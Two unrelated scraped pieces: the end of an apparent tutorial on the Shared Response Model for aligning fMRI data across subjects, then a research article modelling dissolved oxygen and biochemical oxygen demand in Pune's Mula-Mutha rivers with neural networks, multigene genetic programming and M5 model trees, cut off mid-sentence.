vol. 28 (pp. 460-468). link Introduces the SRM method of functional alignment with several performance benchmarks. 2. Haxby, J. V., Guntupalli, J. S., Nastase, S. A., & Feilong, M. (2020). Hyperalignment: modeling shared information encoded in idiosyncratic cortical topographies. eLife, 9, e56601. link Recent review of hyperalignment and related functional alignment methods. 3. Chen, J., Leong, Y. C., Honey, C. J., Yong, C. H., Norman, K. A., & Hasson, U. (2017). Shared memories reveal shared structure in neural activity across individuals. Nature Neuroscience, 20(1), 115-125. link SRM is used to discover the dimensionality of shared representations across subjects. 4. Nastase, S. A., Liu, Y. F., Hillman, H., Norman, K. A., & Hasson, U. (2020). Leveraging shared connectivity to aggregate heterogeneous datasets into a common response space. NeuroImage, 217, 116865. link This paper demonstrates that applying SRM to functional connectivity data can yield a shared response space across disjoint datasets with different subjects and stimuli. ### Example fMRI data and atlas¶ To work through the SRM functionality, we use an fMRI dataset collected while participants listened to a spoken story called "I Knew You Were Black" by Carol Daniel. These data are available as part of the publicly available Narratives collection (Nastase et al., 2019). Here, we download a pre-packaged subset of the data from Zenodo. These data have been preprocessed using fMRIPrep with confound regression in AFNI. We apply the SRM to a region of interest (ROI) comprising the "temporal parietal" network according to a cortical parcellation containing 400 parcels from Schaefer and colleagues (2018). Once data is loaded, we divide the data into two halves for a two fold validation. We will use one half for training SRM and the other for testing its performance. Then, we normalize the data each half. ### Estimating the SRM¶ Next, we train the SRM on the training data. We need to specify desired dimension of the shared feature space. Although we simply use 50 features, the optimal number of dimensions can be found using grid search with cross-validation. We also need to specify a number of iterations to ensure the SRM algorithm converges. After training SRM, we obtain a shared response $S$ that contains the values of the features for each TR, and a set of weight matrices $W_i$ that project from the shared subspace to each subject's idiosyncratic voxel space. Let us check the orthogonal property of the weight matrix $W_i$ for a subject. We visualize $W_i^TW_i$, which should be the identity $I$ matrix with shape equal to the number of features we selected. ## Between-subject time-segment classification¶ When we trained SRM above, we learned the weight matrices $W_i$ and the shared response $S$ for the training data. The weight matrices further allow us to convert new data to the shared feature space. We call the transform() function to transform test data for each subject into the shred space. We evaluate the performance of the SRM using a between-subject time-segment classification (or "time-segment matching") analysis with leave-one-subject-out cross-validation (e.g. Haxby et al., 2011; Chen et al., 2015. The function receives the data from N subjects with a specified window size win_size for the time segments. A segment is the concatenation of win_size TRs. Then, using the averaged data from N-1 subjects it tries to match the segments from the left-out subject to the right position. The function returns the average accuracy across segments for each subject. Let's compute time segment matching accuracy for the anatomically-aligned data: Now, we compute it after transforming the subjects data with SRM: Lastly, we plot the classification accuracies to compare methods. ## Summary¶ The SRM allows us to find a reduced-dimension shared response spaces that resolves functional–topographical idiosyncrasies across subjects. We can use the resulting transformation matrices to project test data from any given subject into the shared space. The plot above shows the time segment matching accuracy for the training data, the test data without any transformation, and the test data when SRM is applied. The average performance without SRM is 11%, whereas with SRM is boosted to 40%. Projecting data into the shared space dramatically improves between-subject classification. #### References¶ • Chen, P. H. C., Chen, J., Yeshurun, Y., Hasson, U., Haxby, J., & Ramadge, P. J. (2015). A reduced-dimension fMRI shared response model. In C. Cortes, N.D. Lawrence, D.D. Lee, M. Sugiyama, R. Garnett (Eds.), Advances in Neural Information Processing Systems, vol. 28 (pp. 460-468). https://papers.nips.cc/paper/5855-a-reduced-dimension-fmri-shared-response-model • Haxby, J. V., Guntupalli, J. S., Connolly, A. C., Halchenko, Y. O., Conroy, B. R., Gobbini, M. I., Hanke, M., & Ramadge, P. J. (2011). A common, high-dimensional model of the representational space in human ventral temporal cortex. Neuron, 72(2), 404-416. https://doi.org/10.1016/j.neuron.2011.08.026 • Haxby, J. V., Guntupalli, J. S., Nastase, S. A., & Feilong, M. (2020). Hyperalignment: Modeling shared information encoded in idiosyncratic cortical topographies. eLife, 9, e56601. https://doi.org/10.7554/eLife.56601 • Nastase, S. A., Liu, Y. F., Hillman, H., Norman, K. A., & Hasson, U. (2020). Leveraging shared connectivity to aggregate heterogeneous datasets into a common response space. NeuroImage, 217, 116865. https://doi.org/10.1016/j.neuroimage.2020.116865 • Anderson, M. J., Capota, M., Turek, J. S., Zhu, X., Willke, T. L., Wang, Y., Chen P.-H., Manning, J. R., Ramadge, P. J., & Norman, K. A. (2016). Enabling factor analysis on thousand-subject neuroimaging datasets. 2016 IEEE International Conference on Big Data, pages 1151–1160. http://ieeexplore.ieee.org/document/7840719/ • Turek, J. S., Willke, T. L., Chen, P.-H., & Ramadge, P. J. (2017). A semi-supervised method for multi-subject fMRI functional alignment. 2017 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), pages 1098–1102. https://ieeexplore.ieee.org/document/7952326 • Turek, J. S., Ellis, C. T., Skalaban, L. J., Willke, T. L., & Turk-Browne, N. B. (2018). Capturing Shared and Individual Information in fMRI Data, 2018 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP 2018), pages 826-830. https://ieeexplore.ieee.org/document/8462175 • Richard, H., Martin, L., Pinho, A. L., Pillow, J., & Thirion, B. (2019). Fast shared response model for fMRI data. arXiv:1909.12537. https://arxiv.org/abs/1909.12537
| Home | E-Submission | Sitemap | Contact Us | Environ Eng Res > Volume 28(3); 2023 > Article Sahu, Londhe, and Kulkarni: Modelling dissolved oxygen and biochemical oxygen demand using data-driven techniques ### Abstract Precise quantification of Biochemical oxygen demand (BOD) and Dissolved oxygen (DO) are critically important for water quality assessment as well as for development of various management policies. To calculate BOD and DO for any water sample, standard technique Winkler-Azide method is used which is cumbersome and prone to measurement error. Therefore, there is a need to device alternate Data Driven Technique (DDT). In the present study, three different DDT: Artificial Neural Network (ANN), Multi Gene Genetic Programming (MG-GP) and M5 Model Tree (M5T) have been used for DO as well as BOD prediction for 3 separate stretches of Mula-Mutha River situated in Pune, India. Additionally, attempt has been made to predict BOD using modelled DO; which shows possibility of using modelled parameter in development of another model. Performance of the models was assessed through, root mean square error (RMSE); mean absolute relative error (MARE) and coefficient of correlation (R). Results based on 3 stations indicate that ANN and MGGP both outperformed with R above 0.85 and RMSE below 1 mg/L for 2 stations out of 3. MGGP and M5T can grasp the influence parameter which can be seen from the input frequency distribution in MGGP and coefficient of input parameters in M5T. ### 1. Introduction Water being one of the basic needs of human being, role of river is very important in human life. Quality of water is a major concern in India along with other developing countries as 75–80% of the health issues arise from waterborne diseases [1] and the purity of river is pushed down to its threshold due to mixing of untreated industrial and domestic wastes. The timely monitoring and control of surface water quality parameters has become a major concern due to the above-mentioned issues. Water quality monitoring includes measuring and monitoring of wide variety of physical, chemical, and biological parameters. One of the important categories of river pollution is organic pollution and drastically affects the ecological health of ecosystems quantity of organic matter present in any river directly influences biochemical oxygen demand (BOD), chemical oxygen demand (COD) as well as dissolved oxygen (DO) content. Biochemical oxygen demand represents the amount of dissolved oxygen utilized by microorganisms to convert the organic matter (biodegradable) to stable inorganic form. COD is considered as the total quantity of oxygen consuming substances in the complete chemical breakdown of organic substances present in river or water. The DO is another key parameter in river water quality analysis as it represents the amount of free dissolved oxygen present in the water body. Considering the organic pollution, DO, BOD as well as COD becomes the main parameters to analyze the quality and pollution status of river. Measurement of COD in laboratory is time consuming and cumbersome as well as presence of various inorganic interfering matters at times, distorts the results [2]. To undertake the BOD determination, traditionally water sample of water source is diluted with aerated water and kept under incubation in the dark at 20°C for 5 days and the DO of the same is determined initially on day 1 and after 5 days. These methods do not consider algal respiration and ammonia oxidation and thus are less accurate [3]. Additionally, the method is too protracted, tedious, and subjected to various measurement errors [4]. To overcome these limitations there is a need to device alternative techniques to estimate COD, BOD, DO and subsequent Management. Some appropriate, reliable, and quick methods for the water quality monitoring with particular reference to DO, BOD and COD is essentially required. Many researchers have attempted in utilizing data driven techniques (DDT) for predictions of BOD and DO [3]. Data driven technique (DDT) is an approach that extracts the relationship between system state variables (input-output) of a specific system by using computational methods that would supersede or replace knowledge driven model based on physical behaviour [5]. Data driven techniques can also be referred as a computational approach with contribution from data mining, knowledge extraction from data base, artificial intelligence, soft computing, machine learning and pattern recognition. The advantage of using data-driven models lies in the computational methodology that helps uncover non-linear and complex relationships between system variables [6]. The basic goal of DDT is to minimize the difference between observed and simulated output. Examples of most commonly used DDT for water quality parameters are Artificial Neural Networks (ANN), Genetic Programming (GP), and Fuzzy Logic (FL). Out of the three techniques mentioned above the ANNs have been used to predict DO [79] and BOD and DO [4, 10] of river water. Basant et al. [3] modelled BOD and DO using linear regression and ANN simultaneously. Results show that ANN performs relatively better than linear regression and shows that ANN was more capable to capture nonlinear relationship existing between variables of complex system. Schmidet al. [11] and Talib et al. [12] employed multi-layer perceptron with back propagation learning to forecast DO and BOD and the results indicated that these models were capable of capturing long-term trend for DO and BOD. Chen et al. [13] developed FFBP-ANN to predict the DO levels of Reservoir Feitsui in China with reasonable accuracy. Sarkar et al. [14] used ANN to predict DO at downstream by using data at the upstream and central part of the river with high accuracy (correlation coefficient = 0.99). Olyaie et al. [15] compared the accuracy of ANN, Linear genetic programming (LGP), radial based function (RBF) and support vector machine (SVM) to predict the DO. The study demonstrated that SVM performs better with 0.99 correlation coefficient followed by 0.96, 0.91 and 0.81 for the best LGP, ANN and RBF respectively. Besides these, many researchers, tried to model DO and BOD using other data driven techniques like Multivariate Adaptive Regression Spline (MARS), Polynomial chaos expansion etc. For example, Heddam and Kisi [16], implemented different technique MARS to simulate DO and compared the accuracy with the least square support vector machine (LSSVM). Studies showed that MARS performed best with the maximum R (0.965) and the minimum RMSE and MAE values of 0.547 and 0.386 mg/L, respectively followed by LSSVM (Least square support vector Machines). All the studies mentioned earlier, it has been observed that ANN is prominently been used to estimate BOD or DO and show a good performance, however the major impediment in its implementation is lack of simple mathematical expression to produce the final output making it less portable [17]. Techniques like Model Tree with M5T algorithm and Multi gene Genetic programming: a variant of Genetic programming is seldom used for the prediction of water quality parameters. The current work thus predicts DO, BOD with observed data and further predicts BOD with predicted DO. The techniques used in the current study are Artificial Neural Network, Model Tree with M5T algorithm and Multigene genetic programming. The novelty of the study lies in the use of M5T and MGGP for modelling DO and BOD. These techniques, though not very new, are sparingly used in civil engineering in general and in pollution studies, perhaps due to the popularity of artificial neural networks (ANN) in the last two decades or so. The major advantage of utilizing M5T and MGGP is that M5T displays its output in the form of series of equations and MGGP displays in the form of a single equation which can be readily used. Further research around Modelling DO using causative parameters can be observed, however modelling BOD using M5T and MGGP can be infrequently seen. Traditional methods also demand time (5 days at least) in predicting DO and BOD and DDT techniques due to their characteristics can compute the predictors faster (in few minutes) [3]. Further in the current study, the accuracy and applicability of both the MGGP and M5T models are compared with the ANN model using statistical error measures of root mean square error (RMSE), mean absolute relative error (MARE), and coefficient of correlation (R), along with visual presentation in form of scatter plots. The paper is further organized as follow: The techniques used are introduced in the next section followed by information on study area and data. Results and discussions are presented next with concluding remarks at the end. ### 2.1. Artificial Neural Network Artificial neural network (ANN) is one of the most flexible mathematical structures developed after considering the working of biological nervous system. It resembles to human brain in two respects: Knowledge to identify the complex nonlinear behavior or pattern acquired by the network through the learning process and use of strength of the interneuron connection known as synaptic weights to store the knowledge. Generally, ANN consists of Input layer, output layer and one or more hidden layers with or without bias at each layer. Each layer consists of one or more nodes or neurons which transfer the information from input to output layer. The neurons in input and output layer are problem dependent (equal to independent and dependent parameters respectively). However, number of hidden layers and neurons in each hidden layer differ from problem to problem and governed by the accuracy requirements. Generally, a three-layered feed forward neural network is found adequate to solve non-linear problems in Civil and Environmental Engineering [18]. The inputs are multiplied by weights and a bias is added to it. This weighted input is then transferred through a transfer function to yield output of the first or input layer. This output then becomes inputs for the next hidden layer and multiplied by layer weights and a bias is added to it. This sum is then transferred through another transfer function (same or different than the first one) to yield output of the first hidden layer. The process is continued till the last or output layer is reached. At the output layer the error is calculated by taking the difference between network outputs i.e., predicted value and the target value. The error is minimized by adjusting the weight and biases by moving in the backward direction using error reduction algorithms till the targeted accuracy in output is achieved. This is called as training a Feed Forward Back Propagation ANN where information is processed in the forward direction and error is distributed in the backward direction. There are other types of ANN as well such as Radial Basis function Neural Network, Generalized Regression Neural Networks, and Recurrent Neural Networks etc. which are out of scope of the present study. The trained weights and biases are then retained and applied on an unseen data for testing purpose. If the model performance in testing is satisfactory which is judged by applying one or more statistical parameters as well as visual inspection, then it is said to be ready for actual operation. The relation of weights with input and output is demonstrated in Fig. S1. Readers can refer to [1923] for detail working of an ANN. ### 2.2. M5 Model Tree Model Tree utilizes divide and conquer approach to provide rules for linear model to reach at leaf node. The linear models are then developed to quantify the contribution of each attribute to the overall predicted value. M5 Model Tree (M5T) is a reconstruction of Quinlan’s M5 algorithm to prompt regression trees of models [25]. M5T combines a standard decision tree with the possibility of linear regression functions at the nodes. For building model trees using the M5T algorithm, an attribute is chosen first on the basis of higher uncertainty or high standard deviation to represent the root node, and one branch is created for each conceivable value; the example set is then divided into subsets, one for each attribute value. Now for each branch, the procedure may be repeated recursively, utilising just the samples that actually reach the branch. If all samples at a node have the same categorization at any moment, the tree’s growth is halted [2627]. Splitting criteria are used to determine which attribute is picked to be used for a split for a given set of samples. The percentage split determines how much of your data will be retained for training the classifier. The remaining information is used to determine the model’s accuracy during the testing phase. You may make several samples (or folds) from the training dataset using Cross validation Fold. If you choose to build N folds, the model will be run repeatedly N times. And each time, one of the folds is saved for validation while the remaining N-1 folds are used to train the model. The cross-validation result is computed by averaging the results of all folds. The more cross validation folds you employ, the more accurate your model will become. This causes the model to train on randomly chosen data, which increases its robustness [2829]. Fig. S2 (a) describes the splitting function for the input x1 × x2 variables into various different linear regression function at the leaves namely LM1–LM6 by using M5 algorithm of Model tree. Simplified form of the model equation is y = b0 + b1x1 + b2x2, in which b0, b1, and b2 are linear regression constants and Fig. S2 (b) explains the relation of branches in the form of a tree diagram. For details of MT readers are referred to [28, 30]. ### 2.3. Genetic Programming and Multi Gene Genetic Programming Genetic programming (GP) is domain independent method that genetically breeds a population of random computer programs to solve the problem. It comes under supervised machine learning which searches its solution in a program space instead of a data space. The solution in the form of programs created by traditional GP is represented as tree structures and expressed using a functional programming language. Genetic Programming (GP) follows the principle of survival of the fittest; the one who is fit is going to survive and involve in evolution of next generation. Initially to generate population, solution is searched blindly in a large space of program by conducting tournament. GP assign a fitness value to each program in a population as a performance task. The two programs that perform the best win the tournament and selected for next evolution. The GP algorithm copies the two winner programs and transposes these into two new programs via genetic operator (crossover or Mutation) i.e., winners now have offspring, and two loser programs are replaced into the population by new child program from the tournament. The creation of new child program continues till a specified number of children in a generation are produced. The best program that appears in a maximum number of any generations is designated as the GP result. Fig. S3 represents the typical GP model and its function, the functions can contain basic mathematical operators (e.g., +, −, X, /), Boolean logic functions (e.g., AND, OR, NOT), trigonometric functions (e.g. sin, cos), or any other user-defined functions. Multigene genetic programming (MGGP) is a variant of GP. It is designed to create compact mathematical models of targeted response (output) data that are multi gene in nature. In other terms nonlinear input variables are transformed to combined in low order (by restricting gene or tree depth) linear weighted tree. The standard GP representation is based on the evaluation of a single tree (model) expression. In MGGP multigene individuals consist of number of genes, each of which represent as traditional GP tree expression [32]. Firstly, the number of populations and generations are chosen for the MGGP model, which often relies on the complexity of issues and the number of alternative solutions. A huge number of populations and generations are examined in order to develop models with the least amount of uncertainty. Once the population of genes is generated and fitness function values are evaluated, each gene is modified based on the principles of natural evolution with mutations and crossovers, thus producing offspring. The mutation process picks branches, along with sub nodes, and replaces each bunch with a randomly generated sub tree. However, the crossover operation, terminals or branched nodes of parent trees are randomly selected, and the selected points are exchanged. This evolution step is iterated until the termination criterion is met, enhancing the fitness of the models produced. Although maximum number of genes (trees) in an individual, as well as the maximum tree depth, has a direct impact on the size of the search space and the number of solutions examined inside it. The success of the MGGP algorithm often rises when these parameters are increased. Finally, as the output numbers of models are generated, out of that best model is selected on the basis of simplicity as well as greatest fitness value. The user may adjust the simplicity of the model through parameter settings (e.g., maximum tree depth or number of genes). Fig. S4 shows a typical MGGP model generated by 2 traditional GP trees. This model predicts an output variable using input variables x1, x2 and x3. Given model structure contains nonlinear terms (e.g., sin, cos, sqrt.) though linear in the parameters with respect to the coefficients d0, d1 & d2. The function set contain the basic arithmetic operators (+, x, −, √, / etc.) and Boolean logic functions (sin, cos, tanh, etc.). It is relevant to note that the maximum permissible number of genes (Gmax) for a model and the maximum tree depth (Dmax) is specified by the user to have a control over the complexity of the generated model. The evolved models are linear combinations of low order nonlinear transformations of the predictor variables. For details of GP readers are referred [33] and for MGGP readers referred to [17]. ### 3. Study Area The study area considered in the study is Pune City, which is situated in Maharashtra, India. Pune is the 8th largest city in India, situated on the banks of two rivers, Mula and Mutha. The combined Mula-Mutha river flows through the city of Pune after their confluence at Sangamwadi (Refer Fig. S5). The Mula river travels a distance of about 64 km from its origin in the hilly areas of Pune District, of which 40 km is hilly terrain. It enters Pune city from upstream Balewadi (Latitude 18 34′ 23.17″, Longitude 73 51′ 47.6″) and flows through populated areas of Pune such as Pimple Gaurav and Vishrant Wadi before meeting at downstream Sangamwadi (Latitude 18 32′ 16.6″, Longitude 73 45′ 38.6″) Mula River meets Mutha. Several villages and small-scale industries like paper mills and sugar mills lie along the banks of the Mula River within the Pune Metropolitan Region, which is responsible for generating waste in the river Mula. The Mula river receives waste from agriculture runoff too (EIA report; PMC 2018). The Mutha River originates in the Western Ghats and flows eastward for about 14 km till it merges with the Mula River in the city of Pune. Many villages and old city areas are along the Mutha River within the Pune Metropolitan region. After merging with the Mula River in Pune, it flows downstream as the Mula-Mutha River to join the Bhima River, a major tributary of the Krishna River flowing southeast. The Mula-Mutha River is the most polluted river as it contains wastewater from various sewage treatment plants as well as common effluent treatment plants (CPCB Report 2019). For the development of BOD and DO models, water quality data set were collected in proportion to the length of the river. The Mula River (30km), the Mutha River (14 km), and the Mula-Mutha River (25km) are all different lengths of river. Moreover, the deviation in the number of data points with respect to the stretch is not more than 10%. The collected data for the Mula-Mutha River was received from Nashik Hydro Works in Maharashtra India from 2003 to 2018 (Water Resources Department Government of Maharashtra, www.mahahp.gov.in). ### 4. Water Quality Data Set Water Quality data set required for the current study was collected from Hydro Nashik Maharashtra, India [www.mahahp.gov.in]. River quality parameters are greatly influenced by the anthropogenic activities usually coupled with nonlinear and complex biochemical processes. Biochemical Oxygen Demand (BOD) and Dissolved Oxygen (DO) are influenced by factors like total solids (TS), alkalinity (Alk.), nitrite (No3-N), pH, electrical conductivity (EC), water temperature (Temp.) etc. [10]. To select input parameters for DO and BOD models, it is necessary to understand the relationship of these parameters with DO and BOD. Salts and other inorganic chemicals dissolve in water and break into tiny electrically charged (Electrical Conductivity (EC)) particles called ions thus increasing the ability of water to conduct electricity while decreasing the potential of oxygen to get dissolved in water [35]. Similarly, an increase in salt (alkalinity) content leading to a high amount of total dissolved solids (TDS) results in lower amount of atmospheric oxygen to get dissolved in the river water stream. As discussed in the earlier section, biochemical oxygen demand is a measure of the biodegradable organic matter present in the water sample expressed in terms of the DO required to oxidize, hence the amount of DO directly influences the BOD content. Nitrite is extremely toxic to aquatic life but it rapidly oxidizes to nitrate (No3-No2), which is responsible for the growth of water hyacinth covering the surface of river making it difficult for the sunlight to reach beneath the water surface decreasing the rate of aeration and in turn the DO demand increases [36], pH is another important water quality parameter which is controlled by inter-related chemical reactions that produce or consume hydrogen ions. Low pH indicates the concentration of hydrogen ions or the increased bacterial activity for organic matter decomposition i.e., low BOD and DO. While pH increases the solubility of phosphorus and nitrates making them more accessible for plant growth and increasing the demand for dissolved oxygen which ultimately increases the BOD content [37, 38]. Water Temperature (Temp.) is a controlling factor for aquatic life: it controls the rate of metabolic activities, reproductive activities and therefore, life cycles. If stream temperature increases, decreases, or fluctuates too widely, metabolic activities fluctuate. The water quality data set required for the current study was collected from Hydro Nashik, Maharashtra, India. River quality parameters are greatly influenced by anthropogenic activities, usually coupled with non-linear and complex biochemical processes. Biochemical oxygen demand and Dissolved Oxygen are influenced by factors like total solids, alkalinity, nitrite, pH, conductivity, water temperature, etc. [10]. To select input parameters for DO and BOD models, it is necessary to understand the relationship of these parameters and DO and BOD. Salts and other inorganic chemicals dissolve in water and break into tiny electrically charged (EC) particles called ions, thus increasing the ability of water to conduct electricity while decreasing the potential of oxygen to get dissolved in water [35]. Similarly, a rise in salt (alkalinity) content, which results in a large quantity of total dissolved solids, leads in less atmospheric oxygen being absorbed in the river water stream. As discussed in the earlier section, biochemical oxygen demand is a measure of the biodegradable organic matter present in the water sample expressed in terms of the DO required to oxidise it. Hence, the amount of DO directly influences the BOD content. At first nitrite is extremely toxic to aquatic life, but it rapidly oxidises to nitrate (No3-No2), which is responsible for the growth of water hyacinth, covering the surface of a river, making it difficult for the sunlight to reach beneath the water surface, decreasing the rate of aeration and, in turn, the DO demand increases [36]. pH is another important water quality parameter that is controlled by inter-related chemical reactions that produce or consume hydrogen ions. Low pH indicates decomposition of organic matter [37]. Water temperature is a controlling factor for aquatic life: it controls the rate of metabolic and reproductive activities and, therefore, life cycles. If stream temperature increases, decreases, or fluctuates too widely, metabolic activity will fluctuate as well; hence the rate of decomposition by microorganisms will be hampered. [39]. The statistical analysis of the data at the three reaches in Mula, Mutha and Mula-Mutha rivers used in the present study is as shown in Table S1, which includes minimum (min), maximum (max), standard deviation (sd), mean and skewness coefficient. It is clear from Table 1 that the Skewness coefficient (Csx) is quite low for most of the data sets, which is considered appropriate as high skewness value reflects negative impact on performance of ANN [40]. For DO and BOD, the concentrations ranged from 0.0 mg/L, 48 mg/L respectively, which indicates that the samples have lower than the minimum allowable value (CPCB, 2015). Table S2 and S3 shows the relationship of input parameters with DO and BOD for all three stretches of the Mula-Mutha River. For both the Mutha and Mula rivers, major contributing parameters for DO are EC, TDS, TS, alkalinity, hardness, and pH. However, for the Mula-Mutha River, a different pattern is observed, with pH, TDS, and No3-No2 as the main contributors because No3-N rapidly oxidises to No3-No2, which is responsible for decreasing DO. Similar pattern is observed for BOD too. Considering the literature, existing records, statistical analysis and correlation behavior, the water quality parameters selected for modelling DO are: pH, Electrical conductivity (EC), Alkalinity (ALK), Total Solids (TS), Total Dissolved Solids (TDS), Nitrite (No3-N) and Temperature (Temp) and parameters for modelling BOD: Dissolved oxygen (DO), pH, Electrical conductivity (EC), Alkalinity (ALK), Total Solids (TS),Total Dissolved Solids (TDS), and Nitrite/Nitrate (No3-N, No3-No2). To consider suitable input parameters, for model development, correlation between DO, BOD with other independent parameters were investigated. Correlation coefficient is the key indicator of the statistical distribution of given data, and equal to the mean normalized standard deviation of the given data set [4]. High value of correlation (0 to 1) indicates better agreement between the variables. It is reflected from the Table S2 and S3 that variability in samples between Mula and Mutha is not much as compared to combined Mula-Mutha. The variability among the samples might be due to the climatic influences and different pollution trend in the study area. It can be observed from the given Table S2 and S3 that most of the parameters display higher influence of majority of the parameters with DO as well as BOD for Mula and Mutha stations separately except temperature and nitrite and for combined Mula-Mutha station, only pH, Nitrate and dissolved solids reflect higher correlations. Nitrite is generated as an intermediate product during biological oxidation of ammonia to nitrate, it is least stable and usually present in much lower amount than nitrate, and thus the influence of nitrite is seen to be less. Temperature is a parameter which has an inverse influence on DO, but variation in temperature is not very high (Table S1) in the given data set which indicates that some other parameter like suspended, dissolved solids, bacterial decomposition, or any other pollutant, besides temperature is affecting oxygen level adversely, this can be clearly seen in Table S2 and S3 [39]. ### 5. Model Development In the present work three sets of models have been developed using ANN, MGGP and M5T techniques for 3 stretches of the river, namely, Mula, Mutha and Mula-Mutha flowing through the city of Pune, India. It can be seen from Fig. S5 that Rivers, Mula and Mutha merges to form Mula-Mutha River at Sangamwadi, Pune (Maharashtra). Considering the geographic location and flow of river/s the models are developed as shown in Table S4 with each set numbers and the input parameters considered for each stretch of the Mula, Mutha and combined Mula-Mutha River. The developed models are partitioned in three Sets: In Set 1 and Set 2 DO as well as BOD have been predicted separately using various causative parameters as input parameters. While in Set 3: BOD is predicted using output (DO) from Set1 model as one of the key input parameters along with other input parameters as seen in Table S4. For determination of BOD, pre knowledge of the DO concentration in water is required, thus an attempt is made in Set 3 to consider the predicted DO from Set 1 to predict BOD. Three layered separate Feed Forward Back-Propagation ANN models were trained to predict the DO and BOD till a low error goal was achieved (mean squared error). All the networks were trained using Levernberg-Marquardt algorithm with ‘log-sigmoid and ‘purelin’ transfer function in the first and second layer, respectively. The data was normalized between 0–1. The model architecture consists of a layer with 6 neurons or nodes as input, a hidden layer with varying range (1 to 32) of neurons as shown in Table 1 and an output layer with a single neuron. The numbers of hidden neurons were fixed by trial-and-error method since selection of an appropriate number of nodes in the hidden layer is very important aspect as a larger number of these may result in over fitting while a smaller number of nodes may not capture the information adequately [41]. For Mula and Mutha stretch optimum hidden neurons are 10 and 11 respectively, however for Mula-Mutha stretch minimum mean square error (MSE) was achieved with 32 neurons. All Models were trained till low error goal was achieved and their weights and biases were retained for testing the remaining data sets. The ANN was trained in the MATLAB 9.1 2016 using NN toolbox [42]. MGGP models have been developed using MATLAB 2016 environment with GPTIPS as source code [32, 42]. The root mean square error (RMSE) function was employed for model calibration. To get the optimum MGGP model various mathematical functions and arithmetic operators have been used. Population and generation reflect the program size and levels of algorithm that is used before the run terminates. The number of population and generation often depends on the complexity of the problem. However, most of the settings to get optimum model were based on experience with the predictive modeling of other data sets of similar size. Maximum number of gene and tree depth directly influences the search space and the number of solutions explored within the search space [17]. The best performing MGGP models have been chosen on the basis of simplicity of models i.e., less complexity and the best fitness value for both calibration as well as testing data set [33]. Complexity of model can also be judged by Pareto chart which represent the entire model generated in terms of complexity as well as accuracy evolved. It can be controlled by defining the values for maximum tree depth and number of gene or tree. MGGP algorithm was run several times by different combination of population and generation till satisfactory result for optimal model was achieved. Population of 500 with 50 generations shows best results as compared to other combinations for Set 1 Mula River. A similar methodology was adopted for Mutha and Mula-Mutha for all three sets. Table S5 gives the details of all the parameter used to Model DO and BOD for a particular stretch. M5 algorithm for MT was implemented using WEKA 3.9 [43]. To compare the performance of the developed models using the three techniques, the data division for training, validation and testing was kept same as 70% for training, 15% for validation and 15% for testing. The performance of the models developed by using ANN, M5T and MGGP has been assessed for unseen data i.e., data in testing by 3 statistical measures; Root mean squared error (RMSE), Mean absolute relative error (MARE) and Coefficient of correlation (R). To identify the best model MARE and RMSE value should be low as much possible and R should be close to 1 [15]. The form of output of the developed models is important for its practical implementation. ANN displays the model in the form of trained weights and biases, MGGP is the form of a single equation and M5T in the form of series of linear equations. MGGP technique is characterized by the property in which the parameters displaying significantly less, or no influence are extracted away from the final equation. This form of outputs can facilitate the use of these techniques for DO and BOD prediction on site and increases the confidence in the same. ### 6. Results and Discussion Results obtained from all three approaches ANN, MGGP and M5T for all models in the three sets for the rivers Mutha, Mula and Mula-Mutha with an aim to predict DO, BOD (With observed DO as one of the input parameters) and BOD (with modelled DO as one of the distinguishing input parameters) are presented in Table 2. It is evident from the results that ANN and MGGP show reasonable results for all the three sets and the models developed using ANN outperforms the M5T and MGGP models. Performance of individual sets is discussed below separately in detail. ### 6.1. DO Models Working of ANN model depends on how well the developed/constructed model is trained and the synaptic weight and biases are adapted to provide a meaningful output. ANN Model 1-1 has been developed with an architecture of 6:10:1, with 6 inputs: pH, EC, Alk., TS, TDS, No3-No2 and 1 output: DO and single hidden layer with 10 hidden neurons was trained for the lowest MSE was achieved. ANN model 1-1 exhibited a reasonable performance with the correlation between observed DO and Predicted DO as = 0.89 and with lower RMSE of 0.61 mg/L (Table 2). Lower RMSE depicts the lesser spread of the residual error (between observed and predicted values) i.e., the standard deviation of the residuals and can contribute towards a better performing model with ANN. ANN model 1-2 i.e., for Mula river resulted into a good performing model with R=0.91, however with a higher RMSE of 0.98 as compared to ANN model 1-1. Higher RMSE of 1.52 can be seen for model 1-3 for Mula and Mutha river. The larger RMSE is due to the larger deviation in data which indicates larger spread of data values as compared to values for Mutha and Mula individually. Being sensitive towards higher values, MARE value is also large i.e., 1.52 in Model 1-3. Output ANN in the form of weights and biases can be further analyzed. MGGP being the next technique utilized, displays the output in the form of a single equation-based model automatically evolves a mathematical expression in a symbolic form, which can be analyzed further to find which variables affect the final prediction and in what trend, and this is the unique aspect of the technique [25]. MGGP develops expressional trees as seen in Fig. S6 for model MGGP 1-2. The trees are combined using different weights of genes. Table 3 summarizes the equations developed from the trees (genes) and the weights of each gene. The final solution is given by a linear sum of the outputs and a bias value, the weights of which are shown in Table 3 and displayed in Eq. 1. Using the least squares method, the weight related to each tree is determined by minimizing the goodness of fit error between the model and the training set [45]. ##### (1) $DO=0.0651 ​(Alk.)-0.00326 (TS)+0.0651 pH-0.0651 (Alk.)1/2-0.00326 (EC)3/2+2.98e-6 (EC)5/2 (0.00163 (TDS) (NO3-NO2))/pH+(0.0214 (EC)(TS)1/2 pH)/(Alk.)+4.1$ It can be seen from the above equation that weighing coefficient for electrical conductivity and total solids are higher than other parameters. This shows that these parameters are highly influential in prediction of DO. This finding is in tune with the fundamental knowledge of water quality under environmental studies [46]. Thus, it can be said the data driven technique of MGGP has reasonably understood the underlying phenomenon of DO and the relation of the input parameters with the output. The following can also be seen from the input frequency chart as shown in Fig. 1 below for Mutha river i.e., model 1-1. To provide the identification of input variables that are significant to the output, graphical input frequency analysis of single model or of a user-specified fraction of the population is used [45]. A similar trend can be seen in the frequency analysis chart (not included here) for Model MGGP 1-3 i.e., for Mula-Mutha river. The chart in Fig. 1 depicts the higher contribution of EC followed by alkalinity, No3-No2, total solids and other parameters. This finding is true according to the fundamental knowledge of the DO as stated in section 4 [46]. The equations of each of the genes for model 1-2 are shown in Fig. S7. From all the models in Set 1 developed using MGGP, model 1-1 and 1-3 i.e., for Mutha river and combined Mula-Mutha river shows higher performance in terms of lowest RMSE. A higher RMSE is seen for model 1-2. Further MGGP technique evolves multiple model choices to the designer. Any best single model can be selected based on the application requirement with the help of Pareto chart. Pareto chart as seen in Fig. S8 for MGGP Model 1-3 represented the population of the total evolved models in terms of their complexity i.e., number of nodes as well as their accuracy (fitness). The generated models that perform comparatively well and have fewer nodes or less complexity than the best-generated model in the population can be identified in 